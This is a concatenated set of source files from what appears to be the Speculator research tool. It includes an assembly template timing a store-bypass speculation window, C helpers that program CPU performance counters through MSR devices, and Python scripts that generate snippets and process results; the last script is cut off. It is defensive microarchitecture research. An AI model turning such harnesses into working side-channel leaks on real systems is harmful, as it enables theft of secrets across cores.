; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    warmup_cnt: db 1
    fill: times 63 db 0

    warmup_cnt_fake: dq 1
    fill2: times 60 db 0

    array: times 64 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    offset: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: single-pass harness (no loop) around a store followed by a
; load of the same location, where the store's address comes out of a div/mul
; chain and the load's address is available immediately. The counters run
; from start_counter to stop_counter; the snippet is placed after the load.
; pipeline_flush and the counter, MSR, pinning and exit macros come from the
; included files and are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
    lfence
    pipeline_flush
    reset_counter
    start_counter
    mov rsi, fill2                      ; load base: known straight away
    ; Store base: rdi = (fill2 / 2) * 2, computed through div and mul so the
    ; store address resolves late. It equals rsi only if fill2 is at an even
    ; address - TODO confirm the layout guarantees that.
    mov rdi, fill2
    mov rax, rdi
    xor rdx, rdx
    mov rcx, 2
    div rcx
    mov rdi, rax
    mov rax, 2
    mov rcx, 10                         ; byte offset used by both the store and the load
    mul rdi
    mov rdi, rax
    mov rdx, fill
    mov al, 0x10
    mov [rdi+rcx], al                   ; store 0x10 at store-base + 10
    movzx r8, byte[rsi+rcx]             ; load from load-base + 10
    shl r8, byte 0x1
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######

    ; UNCOMMENT TO TEST CYCLES span for speculation

    mov QWORD[warmup_cnt_fake], rdx
    mov DWORD[warmup_cnt_fake + 4], edx
    mov rax, QWORD[warmup_cnt_fake]

    ; OR

    ;mulps xmm0,xmm1

    stop_counter

    msr_close
    exit 0

-------------------------------------------------------------------------------- /examples/v4_cycles/v4_cycles.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "fnop", 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | "fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop", 33 | "fnop", 34 | "fnop", 35 | "fnop", 36 | "fnop", 37 | "fnop", 38 | "fnop", 39 | "fnop", 40 | "fnop", 41 | "fnop", 42 | "fnop", 43 | "fnop", 44 | "fnop", 45 | "fnop", 46 | "fnop", 47 | "fnop", 48 | "fnop", 49 | "fnop", 50 | "fnop", 51 | "fnop", 52 | "fnop", 53 | "fnop", 54 | "fnop", 55 | "fnop", 56 | "fnop", 57 | "fnop", 58 | "fnop", 59 | "fnop", 60 | "fnop", 61 | "fnop", 62 | "fnop", 63 | "fnop", 64 | "fnop", 65 | "fnop", 66 | "fnop", 67 | "fnop", 68 | "fnop", 69 | "fnop", 70 | "fnop", 71 | "fnop", 72 | "fnop", 73 | "fnop", 74 | "fnop", 75 | "fnop", 76 | "fnop", 77 | "fnop", 78 | "fnop", 79 | "fnop", 80 | "fnop", 81 | "fnop", 82 | "fnop", 83 | "fnop", 84 | "fnop", 85 | "fnop", 86 | "fnop", 87 | "fnop", 88 | "fnop", 89 | "fnop", 90 | "fnop", 91 | "fnop", 92 | "fnop", 93 | "fnop", 94 | "fnop", 95 | "fnop", 96 | "fnop", 97 | "fnop", 98 | "fnop", 99 | "fnop", 100 | "fnop", 101 | "fnop", 102 | "fnop", 103 | "fnop", 104 | "fnop", 105 | "fnop", 106 | "fnop", 107 | "fnop", 108 | "fnop", 109 | "fnop", 110 | "fnop", 111 | "fnop", 112 | "fnop", 113 | "fnop", 114 | "fnop", 115 | "fnop", 116 | "fnop", 117 | "fnop", 118 | "fnop", 119 | "fnop", 120 | "fnop", 121 | "fnop", 122 | "fnop", 123 | "fnop", 124 | "fnop", 125 | "fnop", 126 | "fnop", 127 | "fnop", 128 | "fnop", 129 | "fnop", 130 | "fnop", 131 | "fnop", 132 | "fnop", 133 | "fnop", 134 | "fnop", 135 | "fnop", 136 | 
"fnop", 137 | "fnop", 138 | "fnop", 139 | "fnop", 140 | "fnop", 141 | "fnop", 142 | "fnop", 143 | "fnop", 144 | "fnop", 145 | "fnop", 146 | "fnop", 147 | "fnop", 148 | "fnop", 149 | "fnop", 150 | "fnop", 151 | "fnop", 152 | "fnop", 153 | "fnop", 154 | "fnop", 155 | "fnop", 156 | "fnop", 157 | "fnop", 158 | "fnop", 159 | "fnop", 160 | "fnop", 161 | "fnop", 162 | "fnop", 163 | "fnop", 164 | "fnop", 165 | "fnop", 166 | "fnop", 167 | "fnop", 168 | "fnop", 169 | "fnop", 170 | "fnop", 171 | "fnop", 172 | "fnop", 173 | "fnop", 174 | "fnop", 175 | "fnop", 176 | "fnop", 177 | "fnop", 178 | "fnop", 179 | "fnop", 180 | "fnop", 181 | "fnop", 182 | "fnop", 183 | "fnop", 184 | "fnop", 185 | "fnop", 186 | "fnop", 187 | "fnop", 188 | "fnop", 189 | "fnop", 190 | "fnop", 191 | "fnop", 192 | "fnop", 193 | "fnop", 194 | "fnop", 195 | "fnop", 196 | "fnop", 197 | "fnop", 198 | "fnop", 199 | "fnop", 200 | "fnop", 201 | "fnop" 202 | ] 203 | } 204 | -------------------------------------------------------------------------------- /include/amd.h: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 
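#ifndef AMD_H
#define AMD_H

// NOTE(review): this header uses uint8_t/uint64_t, pwrite/pread, fprintf and
// exit without including anything itself, so it depends on the including file
// for <stdint.h>, <unistd.h>, <stdio.h> and <stdlib.h>. The functions are also
// defined here without `static`, so including the header from more than one
// translation unit would produce duplicate symbols.

// AMD MSRs for performance monitoring
#define PerfEvtSel0 0xc0010000 // Event select registers (4 in total - 0xc0010003)
#define PerfCtr0 0xc0010004 // Performance counters (4 in total - 0xc0010007)

// Number of PerfEvtSel/PerfCtr registers in each bank, per the ranges above.
// An index past this would address a different MSR: PerfEvtSel0 + 4 is
// already PerfCtr0, and PerfCtr0 + 4 is outside both banks.
#define AMD_PERF_CTR_COUNT 4

// AMD PerfEvtSel register fields
#define PERF_EVENT_SELECT 0x000000ff // Unit and Event Selection
#define PERF_UNIT_MASK 0x0000ff00 // Event Qualification
#define PERF_USR 0x00010000 // User mode
#define PERF_OS 0x00020000 // Operating-System Mode
#define PERF_E 0x00040000 // Edge Detect
#define PERF_PC 0x00080000 // Pin Control
#define PERF_INT 0x00100000 // Enable APIC Interrupt
#define PERF_EN 0x00400000 // Enable Counter
#define PERF_INV 0x00800000 // Invert Counter Mask
#define PERF_CNT_MASK 0xff000000 // Counter Mask

/*
 * Write val to performance counter register PerfCtr0 + i.
 *
 * fd  - descriptor the register is written through; the file offset selects
 *       the register (presumably an open /dev/cpu/N/msr device).
 * i   - counter index, 0 .. AMD_PERF_CTR_COUNT - 1.
 * val - 64-bit value to write.
 *
 * Prints a message and exits the process on an out-of-range index or a short
 * or failed write.
 */
void write_to_AMD_PMCi(int fd, uint8_t i, uint64_t val) {
    int rv = 0;

    // Refuse to turn a bad index into a write to an unrelated MSR.
    if (i >= AMD_PERF_CTR_COUNT) {
        fprintf (stderr, "Invalid AMD ctr register index\n");
        exit(EXIT_FAILURE);
    }

    rv = pwrite(fd, &val, sizeof(val), PerfCtr0+i);

    if (rv != (int)sizeof(val)) {
        fprintf (stderr, "Impossible to write AMD ctr register\n");
        exit(EXIT_FAILURE);
    }
}

/*
 * Write val to event select register PerfEvtSel0 + i.
 *
 * fd  - descriptor the register is written through (see write_to_AMD_PMCi).
 * i   - event select index, 0 .. AMD_PERF_CTR_COUNT - 1.
 * val - 64-bit value built from the PERF_* fields above.
 *
 * Prints a message and exits the process on an out-of-range index or a short
 * or failed write.
 */
void write_to_AMD_PERFEVTSELi(int fd, uint8_t i, uint64_t val) {
    int rv = 0;

    // PerfEvtSel0 + 4 is PerfCtr0, so an index of 4 or more would overwrite
    // a counter (or another MSR) instead of an event select register.
    if (i >= AMD_PERF_CTR_COUNT) {
        fprintf (stderr, "Invalid AMD sel register index\n");
        exit(EXIT_FAILURE);
    }

    rv = pwrite(fd, &val, sizeof(val), PerfEvtSel0+i);

    if (rv != (int)sizeof(val)) {
        fprintf (stderr, "Impossible to write AMD sel register\n");
        exit(EXIT_FAILURE);
    }
}

/*
 * Read and return the 64-bit value of performance counter PerfCtr0 + i.
 *
 * fd - descriptor the register is read through (see write_to_AMD_PMCi).
 * i  - counter index, 0 .. AMD_PERF_CTR_COUNT - 1.
 *
 * Prints a message and exits the process on an out-of-range index or a short
 * or failed read.
 */
uint64_t read_AMD_PMCi(int fd, uint8_t i) {
    int rv = 0;
    uint64_t ret = -1;

    if (i >= AMD_PERF_CTR_COUNT) {
        fprintf (stderr, "Invalid AMD perf counter index\n");
        exit(EXIT_FAILURE);
    }

    rv = pread(fd, &ret, sizeof(ret), PerfCtr0 + i);

    if (rv != (int)sizeof(ret)) {
        fprintf (stderr, "Impossible to read AMD perf counter\n");
        exit(EXIT_FAILURE);
    }

    return ret;
}

#endif // AMD_H

--------------------------------------------------------------------------------
/include/config.h.in:
--------------------------------------------------------------------------------
// Copyright 2021 IBM Corporation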
// 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | #ifndef CONFIG_H 15 | #define CONFIG_H 16 | 17 | #cmakedefine DUMMY_NAME "@DUMMY_NAME@" 18 | #define ATTACKER_CORE @ATTACKER_CORE@ul 19 | #define VICTIM_CORE @VICTIM_CORE@ul 20 | 21 | #define SPECULATOR_VER "@SPECULATOR_VERSION@" 22 | #define SPECULATOR_VER_MAJ "@SPECULATOR_VERSION_MAJOR@" 23 | #define SPECULATOR_VER_MIN "@SPECULATOR_VERSION_MINOR@" 24 | #define SPECULATOR_VER_PATCH "@SPECULATOR_VERSION_PATCH@" 25 | 26 | 27 | #endif //CONFIG_H 28 | -------------------------------------------------------------------------------- /include/intel.h: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 
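
#ifndef INTEL_H
#define INTEL_H

// NOTE(review): this header has no #include lines of its own; the fixed-width
// integer types, pread/pwrite, fprintf and exit must be declared by the
// including file.

#define FIXED_COUNTERS 3

const char *intel_fixed_counters[] = {"INSTRUCTIONS_RETIRED", "CYCLES", "UNKNOWN"};

// Terminate the process when i is not a valid fixed-counter index
// (0 .. FIXED_COUNTERS - 1). The index is a signed int that is added to an MSR
// address, so a negative or oversized value would select an unrelated MSR.
static void
check_fixed_counter_index(int i) {
    if (i < 0 || i >= FIXED_COUNTERS) {
        fprintf(stderr, "Fixed counter index %d out of range\n", i);
        exit(EXIT_FAILURE);
    }
}

// Write val to IA32_PERF_GLOBAL_CTRL (MSR 0x38F).
//   fd - descriptor the MSR is written through; the MSR address is passed as
//        the file offset (presumably an open /dev/cpu/<n>/msr - confirm with
//        the caller)
// Prints a message and exits with EXIT_FAILURE on a short write.
void
write_to_IA32_PERF_GLOBAL_CTRL(int fd,
                               uint64_t val) {
    ssize_t rv; // pwrite returns ssize_t, not int

    rv = pwrite(fd, &val, sizeof(val), 0x38F);

    if (rv != (ssize_t)sizeof(val)) {
        fprintf(stderr, "Impossible to write IA32_PERF_GLOBAL_CTRL\n");
        exit(EXIT_FAILURE);
    }
}

// Write val to general-purpose counter i (MSR 0xC1 + i).
// NOTE(review): i is not range-checked because this header does not say how
// many general-purpose counters exist; an index of 0xC5 or more reaches the
// event-select MSRs that start at 0x186. Callers must validate i.
// Prints a message and exits with EXIT_FAILURE on a short write.
void
write_to_IA32_PMCi(int fd,
                   uint8_t i,
                   uint64_t val) {
    ssize_t rv;

    rv = pwrite(fd, &val, sizeof(val), 0xC1 + i);

    if (rv != (ssize_t)sizeof(val)) {
        fprintf(stderr, "Impossible to write IA32_PMCi\n");
        exit(EXIT_FAILURE);
    }
}

// Read general-purpose counter i (MSR 0xC1 + i) and return its 64-bit value.
// The index is unchecked, as in write_to_IA32_PMCi.
// Prints a message and exits with EXIT_FAILURE on a short read.
uint64_t
read_IA32_PMCi(int fd,
               uint8_t i) {
    ssize_t rv;
    uint64_t ret = -1;

    rv = pread(fd, &ret, sizeof(ret), 0xC1 + i);

    if (rv != (ssize_t)sizeof(ret)) {
        fprintf(stderr, "Impossible to read IA32_PMCi\n");
        exit(EXIT_FAILURE);
    }

    return ret;
}

// Write val to fixed counter i (MSR 0x309 + i), i in 0 .. FIXED_COUNTERS - 1.
// Prints a message and exits with EXIT_FAILURE on a bad index or a short write.
void
write_to_IA32_FIXED_CTRi(int fd,
                         int i,
                         uint64_t val) {
    ssize_t rv;

    check_fixed_counter_index(i);
    rv = pwrite(fd, &val, sizeof(val), 0x309 + i);

    if (rv != (ssize_t)sizeof(val)) {
        // The original message named IA32_PMCi, which is a different register.
        fprintf(stderr, "Impossible to write IA32_FIXED_CTRi\n");
        exit(EXIT_FAILURE);
    }
}

// Write val to IA32_FIXED_CTR_CTRL (MSR 0x38D).
// Prints a message and exits with EXIT_FAILURE on a short write.
void
write_to_IA32_FIXED_CTR_CTRL(int fd,
                             uint64_t val) {
    ssize_t rv;

    rv = pwrite(fd, &val, sizeof(val), 0x38D);

    if (rv != (ssize_t)sizeof(val)) {
        // The original message named IA32_PMCi, which is a different register.
        fprintf(stderr, "Impossible to write IA32_FIXED_CTR_CTRL\n");
        exit(EXIT_FAILURE);
    }
}

// Read fixed counter i (MSR 0x309 + i), i in 0 .. FIXED_COUNTERS - 1, and
// return its 64-bit value.
// Prints a message and exits with EXIT_FAILURE on a bad index or a short read.
uint64_t
read_IA32_FIXED_CTRi(int fd,
                     int i) {
    ssize_t rv;
    uint64_t ret = -1;

    check_fixed_counter_index(i);
    rv = pread(fd, &ret, sizeof(ret), 0x309 + i);

    if (rv != (ssize_t)sizeof(ret)) {
        // The original message named IA32_PMCi, which is a different register.
        fprintf(stderr, "Impossible to read IA32_FIXED_CTRi\n");
        exit(EXIT_FAILURE);
    }
    return ret;
}

void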
write_to_IA32_PERFEVTSELi(int fd, 109 | uint8_t i, 110 | uint64_t val) { 111 | int rv; 112 | 113 | rv = pwrite(fd, &val, sizeof(val), 0x186 + i); 114 | 115 | if (rv != sizeof(val)) { 116 | fprintf (stderr, "Impossible to write IA32_PERFEVTSELi\n"); 117 | exit (EXIT_FAILURE); 118 | } 119 | } 120 | 121 | #endif //INTEL_H 122 | -------------------------------------------------------------------------------- /scripts/cr_inc_snip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 
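
import os
import json
import errno
import argparse

basename = ""

def get_index(template):
    """Locate the two insertion points in a template file.

    Scans the file at path `template` line by line and returns
    `(idx_data, idx_code)`. Each value is the 1-based number of the line that
    contains the marker ("DATA STARTS HERE" / "SNIPPET STARTS HERE") plus one,
    or -1 when the marker is absent. If a marker occurs several times the last
    occurrence wins.
    """
    idx_code = -1
    idx_data = -1
    with open(template, "r") as f:
        for lineno, line in enumerate(f, 1):
            if "SNIPPET STARTS HERE" in line:
                idx_code = lineno + 1

            if "DATA STARTS HERE" in line:
                idx_data = lineno + 1
    return (idx_data, idx_code)

def update_data(template, idx_data, idx_code, snippet_json):
    """Insert the snippet's data lines into the template, in place.

    `template` is the list of template lines; every string of
    `snippet_json["DATA"]` is inserted at `idx_data` as a tab-indented line.
    Returns `(template, idx_data, idx_code)` with both indices advanced past the
    inserted lines. When the JSON has no "DATA" key a message is printed and
    the arguments are returned unchanged.
    """
    if "DATA" not in snippet_json:
        print ("The json file loaded has no data object specified")
        return (template, idx_data, idx_code)

    # Inserted data lines push the code insertion point down only when it sits
    # at or after the data insertion point; a template that puts its code
    # section first must keep idx_code as it is.
    code_follows_data = idx_code >= idx_data

    for line in snippet_json["DATA"]:
        template.insert(idx_data, "\t" + line + "\n")
        idx_data = idx_data + 1
        if code_follows_data:
            idx_code = idx_code + 1

    return (template, idx_data, idx_code)

def update_code(args, template, idx_data, idx_code, snippet_json):
    """Write one .asm file per instruction, each one instruction longer.

    Every string of `snippet_json["INST"]` is inserted at `idx_code` as a
    tab-indented line, and after each insertion the whole template is written
    to `<args.output>/<basename>_NNNN.asm`, where NNNN is the 1-based
    instruction count zero-padded to four digits. Exits with status -1 when the
    JSON has no "INST" key. Returns `(template, idx_data, idx_code)`.

    The JSON strings are emitted as source lines without any filtering, so the
    snippet file must come from a trusted source: whatever it contains ends up
    in the generated assembly.
    """
    if "INST" not in snippet_json:
        print("The json file loaded has no INST object specified")
        exit(-1)

    for count, inst in enumerate(snippet_json["INST"], 1):
        template.insert(idx_code, "\t" + inst + "\n")
        idx_code = idx_code + 1
        path = os.path.join(args.output,
                            basename + "_" + "{:04d}".format(count) + ".asm")
        with open(path, "w") as f:
            f.writelines(template)
    return (template, idx_data, idx_code)

def extract_basename(json_file):
    """Return the file name of `json_file` up to its first dot."""
    return os.path.basename(json_file).split('.')[0]

def main():
    global basename
    # Adjacent literals are concatenated as-is, so each piece needs its own
    # trailing space to keep the words apart in the --help output.
    parser = argparse.ArgumentParser(description='This scripts load a json with '
                                                 'snippet structure and create multiple '
                                                 'incremental snippets')
    parser.add_argument('json', help='json file that contains the snippet to be split')
    parser.add_argument('template', help='template file to be complete with the snippet')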
parser.add_argument('--output', '-o', help='output location', default=".") 77 | args = parser.parse_args() 78 | 79 | if not args.json.endswith(".json"): 80 | print ("The file name must have .json extension") 81 | exit(-1) 82 | 83 | if not os.path.isfile(args.json): 84 | print ("Json file does not exists\n") 85 | exit(-1) 86 | 87 | if not os.path.isfile(args.template): 88 | print ("Template file does not exits\n") 89 | exit(-1) 90 | 91 | if not os.path.exists(args.output): 92 | print ("The output folder specified does not exist. It will be created.") 93 | try: 94 | os.makedirs(args.output) 95 | except OSError as e: 96 | if e.errno != errno.EEXIST: 97 | exit(-1) 98 | 99 | basename = extract_basename(args.json) 100 | 101 | with open(args.json, "r") as fp: 102 | snippet_json = json.load(fp) 103 | 104 | (idx_data, idx_code) = get_index(args.template) 105 | 106 | if idx_data == -1 or idx_code == -1: 107 | print ("Wrong template format. Please provide the right template") 108 | exit(-1) 109 | 110 | with open(args.template, "r") as f: 111 | template_base = f.readlines() 112 | 113 | (template_base, idx_data, idx_code) = update_data(template_base, idx_data, 114 | idx_code, snippet_json) 115 | 116 | # print ("idx_data = {}, idx_code = {}".format(idx_data, idx_code)) 117 | 118 | (template_base, idx_data, idx_code) = update_code(args, template_base, idx_data, 119 | idx_code, snippet_json) 120 | 121 | if __name__ == "__main__": 122 | main() 123 | -------------------------------------------------------------------------------- /scripts/post-processing-exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 
7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | import argparse 19 | 20 | 21 | from numpy import std 22 | from numpy import mean 23 | from numpy import average 24 | from collections import defaultdict 25 | 26 | results_misspr = [] 27 | results_pr = [] 28 | result = [] 29 | 30 | def main(): 31 | global results 32 | parser = argparse.ArgumentParser() 33 | parser.add_argument("--location", "-l", 34 | required=True, 35 | help="Specify the result directory to be process") 36 | 37 | arg = parser.parse_args() 38 | 39 | try: 40 | with open(os.path.join(arg.location, "final_results.txt"), "w") as final: 41 | for dirname, dirnames, filenames in os.walk(arg.location): 42 | for f in filenames: 43 | if f == "final_results.txt": 44 | continue 45 | print ("Considering {}".format(f)) 46 | with open(os.path.join(dirname, f), "r") as res_file: 47 | lines = res_file.readlines() 48 | results_misspr = defaultdict(list) 49 | results_pr = defaultdict(list) 50 | result = defaultdict(list) 51 | for l in lines: 52 | splitted_line = l.split("|") 53 | splitted_line = splitted_line[:-1] 54 | result = defaultdict(list) 55 | for item in splitted_line: 56 | category, res = item.split(":") 57 | 58 | result[category].append(int(res)) 59 | 60 | if (category == "BR_MISP_RETIRED.ALL_BRANCHES"): 61 | if int(res) == 1: 62 | for k, v in result.items(): 63 | results_misspr[k].append(v) 64 | else: 65 | for k, v in result.items(): 66 | results_pr[k].append(v) 67 | 68 | # final.write ("######### {} ###########\n".format(f)) 69 | print ("Computing predicted for {}".format(f)) 70 | # 
final.write ("PREDICTED CORRECTLY\n") 71 | for category, res in results_pr.items(): 72 | len_ = f.rpartition('_')[2] 73 | if category == "UOPS_EXECUTED.CORE" or \ 74 | category == "UOPS_EXECUTED.THREAD": 75 | if "only" in f : 76 | pre = "NOBR:PRE" 77 | else: 78 | pre = "BR:PRE" 79 | res_mean = mean(res, axis=0) 80 | res_std = std(res, axis=0) 81 | res_final = [x for x in res 82 | if (x >= res_mean - 2 * res_std)] 83 | res_final = [x for x in res_final 84 | if (x <= res_mean + 2 * res_std)] 85 | final.write("{}:{}:{}\n" 86 | .format(len_, 87 | pre, 88 | average(res_final)#, 89 | # std(res_final) 90 | ) 91 | ) 92 | 93 | print ("Computing miss-predicted for {}".format(f)) 94 | # final.write ("\nMISS-PREDICTED\n") 95 | for category, res in results_misspr.items(): 96 | len_ = f.rpartition('_')[2] 97 | if category == "UOPS_EXECUTED.CORE" or \ 98 | category == "UOPS_EXECUTED.THREAD": 99 | if "only" in f : 100 | pre = "NOBR:MISS" 101 | else: 102 | pre = "BR:MISS" 103 | res_mean = mean(res, axis=0) 104 | res_std = std(res, axis=0) 105 | res_final = [x for x in res 106 | if (x >= res_mean - 2 * res_std)] 107 | res_final = [x for x in res_final 108 | if (x <= res_mean + 2 * res_std)] 109 | final.write("{}:{}:{}\n" 110 | .format(len_, 111 | pre, 112 | average(res_final) 113 | # std(res_final) 114 | ) 115 | ) 116 | # final.write ("---------------------------------------------------------\n") 117 | except IOError: 118 | print ("Error while opening {}".format(arg.input)) 119 | exit(-1) 120 | 121 | 122 | if __name__ == "__main__": 123 | main() 124 | -------------------------------------------------------------------------------- /scripts/post-processing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 
7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | # import csv 19 | import argparse 20 | 21 | from numpy import std 22 | from numpy import mean 23 | from numpy import average 24 | 25 | from sqlalchemy import or_ 26 | from sqlalchemy import Table 27 | from sqlalchemy import select 28 | from sqlalchemy import Column 29 | from sqlalchemy import Integer 30 | from sqlalchemy import MetaData 31 | from sqlalchemy import create_engine 32 | 33 | results = [] 34 | single_line = dict() 35 | tab = [] 36 | 37 | UOPS_EXECUTED = "" 38 | 39 | def main(): 40 | global results 41 | global UOPS_EXECUTED 42 | parser = argparse.ArgumentParser() 43 | parser.add_argument("--location", "-l", 44 | required=True, 45 | help="Specify the result directory to be process") 46 | parser.add_argument("--thread", "-t", 47 | action='store_true', 48 | help="Specify that UOPS_EXECUTED.TREAD should be used \ 49 | instead") 50 | 51 | arg = parser.parse_args() 52 | 53 | 54 | if arg.thread: 55 | UOPS_EXECUTED = "UOPS_EXECUTED.THREAD" 56 | else: 57 | UOPS_EXECUTED = "UOPS_EXECUTED.CORE" 58 | # Connecting to the in-memory db 59 | engine = create_engine('sqlite:///:memory:', echo=False) 60 | conn = engine.connect() 61 | metadata = MetaData(bind=engine) 62 | 63 | try: 64 | with open(os.path.join(arg.location, "final_results.txt"), "w") as final: 65 | for dirname, dirnames, filenames in os.walk(arg.location): 66 | for f in sorted(filenames): 67 | if f == "final_results.txt": 68 | continue 69 | print ("Considering {}".format(f)) 70 | with open(os.path.join(dirname, f), "r") as res_file: 71 | lines 
= res_file.readlines() 72 | 73 | first = True 74 | tab = [] 75 | for l in lines: 76 | if first: 77 | categories = l.split("|") 78 | categories = categories[:-1] 79 | first = False 80 | table = Table(f, metadata, 81 | Column('id', Integer, autoincrement=True, primary_key=True), 82 | *(Column(counter_name, Integer()) for 83 | counter_name in categories) 84 | ) 85 | table.create() 86 | metadata.create_all(engine) 87 | else: 88 | i = 0 89 | single_line = dict() 90 | 91 | splitted_line = l.split("|") 92 | splitted_line = splitted_line[:-1] 93 | 94 | for item in splitted_line: 95 | single_line[categories[i]] = item 96 | i = i + 1 97 | 98 | tab.append(single_line) 99 | conn.execute(table.insert(), tab) 100 | 101 | # Pull CYCLES column to compute mean and std 102 | sql = select([table.c.CYCLES, 103 | table.c[UOPS_EXECUTED]]) 104 | cycles_res = conn.execute(sql) 105 | 106 | res_cycles = [] 107 | res_uops = [] 108 | 109 | for row in cycles_res: 110 | res_cycles.append(row[0]) 111 | res_uops.append(row[1]) 112 | 113 | cycle_mean = mean(res_cycles, axis=0) 114 | cycle_std = std(res_cycles, axis=0) 115 | 116 | uops_mean = mean(res_uops, axis=0) 117 | uops_std = std(res_uops, axis=0) 118 | 119 | # Delete outliers and where there was no mispredicted 120 | # branch 121 | a_clause = or_(table.c.CYCLES <= (cycle_mean - 2 * cycle_std), 122 | table.c.CYCLES >= (cycle_mean + 2 * 123 | cycle_std)).self_group() 124 | b_clause = or_(table.c[UOPS_EXECUTED] <= (uops_mean - 2 * uops_std), 125 | table.c[UOPS_EXECUTED] >= (uops_mean + 2 * uops_std)).self_group() 126 | if uops_std != 0: 127 | c_clause = or_(a_clause, b_clause).self_group() 128 | else: 129 | if cycle_std != 0: 130 | c_clause = a_clause 131 | else: 132 | c_clause = or_(False, False) 133 | 134 | 135 | d_clause = or_(c_clause, 136 | table.c["BR_MISP_RETIRED.ALL_BRANCHES"] 137 | <= 0).self_group() 138 | 139 | d = table.delete() \ 140 | .where(c_clause) 141 | 142 | res = conn.execute(d) 143 | 144 | # sel = select([table]) 145 | # res 
